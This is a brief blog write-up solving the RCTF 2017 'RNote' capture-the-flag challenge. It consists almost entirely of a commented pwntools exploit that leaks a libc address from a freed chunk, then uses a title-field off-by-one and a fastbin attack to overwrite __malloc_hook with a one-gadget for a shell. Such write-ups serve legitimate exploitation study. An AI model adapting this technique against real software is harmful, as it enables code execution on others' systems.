RCTF 2017 RNote write up
H0R1N
2019. 3. 30. 14:10
푼 것들 올리는 용
from pwn import *
# Uncomment to dump every byte exchanged with the target while debugging.
# context.log_level = "debug"
p = process(["./RNote"])
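def add(size, title, content, io=None):
    """Menu option 1: create a note.

    Answers the four ``": "`` prompts in order: menu choice, size (presumably
    the content length), title, content. Title and content are sent verbatim;
    sendline() appends a newline, which the leak stage of the exploit relies
    on, so callers must not strip it themselves.

    io defaults to the global tube ``p``; pass another tube to drive a
    second instance or a remote target with the same helper. Bytes literals
    are used so the helper works under both Python 2 and Python 3 pwntools.
    """
    io = p if io is None else io
    io.recvuntil(b": ")
    io.sendline(b"1")
    io.recvuntil(b": ")
    io.sendline(str(size).encode())
    io.recvuntil(b": ")
    io.sendline(title)
    io.recvuntil(b": ")
    io.sendline(content)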
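def delete(idx, io=None):
    """Menu option 2: free note number ``idx``.

    Answers the menu prompt with ``2`` and the index prompt with ``idx``.
    io defaults to the global tube ``p``; pass another tube to reuse the
    helper against a different target.
    """
    io = p if io is None else io
    io.recvuntil(b": ")
    io.sendline(b"2")
    io.recvuntil(b": ")
    io.sendline(str(idx).encode())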
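def show(idx, io=None):
    """Menu option 3: print note number ``idx``.

    Only drives the menu; the caller reads the printed note from the tube.
    io defaults to the global tube ``p``; pass another tube to reuse the
    helper against a different target.
    """
    io = p if io is None else io
    io.recvuntil(b": ")
    io.sendline(b"3")
    io.recvuntil(b": ")
    io.sendline(str(idx).encode())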
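# --- stage 1: libc leak from a recycled unsorted-bin chunk -----------------
# Two 256-byte notes (above fastbin range). Freeing note 0 sends its chunk to
# the unsorted bin, where fd/bk point into main_arena. Allocating the same
# size again returns that chunk without clearing it, so show() prints the
# 8 'b's followed by whatever is left of the old bk pointer.
add(256, b"aaaa", b"aaaa")
add(256, b"aaaa", b"aaaa")
delete(0)
add(256, b"aaaa", b"bbbbbbbb")
show(0)
p.recvuntil(b"bbbbbbbb")
# NOTE(review): the offset below ends in 0x0a, i.e. the newline that
# sendline() appended after the 8 'b's appears to have been stored too and
# overwrote the low byte of the leaked pointer. The 0x3c4b0a constant already
# accounts for that, so do not "correct" it to the clean arena offset.
main_arena = u64(p.recv(6).ljust(8, b"\x00"))
log.info("main_arena = " + hex(main_arena))
# All three offsets are for the libc the challenge shipped with (they line up
# with the x86-64 glibc 2.23 builds); regenerate them for any other libc.
libc_base = main_arena - 0x3c4b0a
log.info("libc_base = " + hex(libc_base))
# A wrong leak or offset would only surface as heap corruption in stage 2.
# libc is mmap'ed, so a genuine base is always page-aligned: fail fast here.
if libc_base & 0xfff:
    log.error("libc_base %#x is not page-aligned: leak or offset is wrong" % libc_base)
malloc_hook = libc_base + 0x3c4b10
log.info("malloc_hook = " + hex(malloc_hook))
oneshot = libc_base + 0xf1147
log.info("oneshot = " + hex(oneshot))

# --- stage 2: fastbin attack on __malloc_hook ------------------------------
delete(0)
delete(1)
# 90-byte requests round up to 0x70 chunks, i.e. fastbin size. The third
# title is 16 bytes plus one extra byte: that 17th byte is the bug this
# exploit rides on — it spills past the title field into whatever the note
# stores next (which field is hit depends on the note layout; confirm
# against the binary).
add(90, b"a" * 4, b"a" * 4)
add(90, b"b" * 4, b"b" * 4)
add(90, b"c" * 16 + b"\x10", b"c")
delete(0)
delete(1)
delete(2)
# The content of the first re-allocation lands on a chunk that is still
# linked in the 0x70 fastbin, so it overwrites that chunk's fd with a fake
# chunk address. __malloc_hook-0x23 is the usual choice: the size field of
# that fake chunk falls on bytes that read 0x7f on this libc, which passes
# the fastbin size check for the 0x70 bin.
add(90, b"aaaa", p64(malloc_hook - 0x23))
add(90, b"bbbb", b"bbbb")
add(90, b"cccc", b"cccc")
# The fourth 0x70 allocation returns the fake chunk. Its user data starts at
# __malloc_hook-0x23+0x10, so 19 bytes of padding place the one-gadget
# exactly on __malloc_hook; the next malloc() the program makes calls it.
add(90, b"dddd", b"a" * 19 + p64(oneshot))
p.interactive()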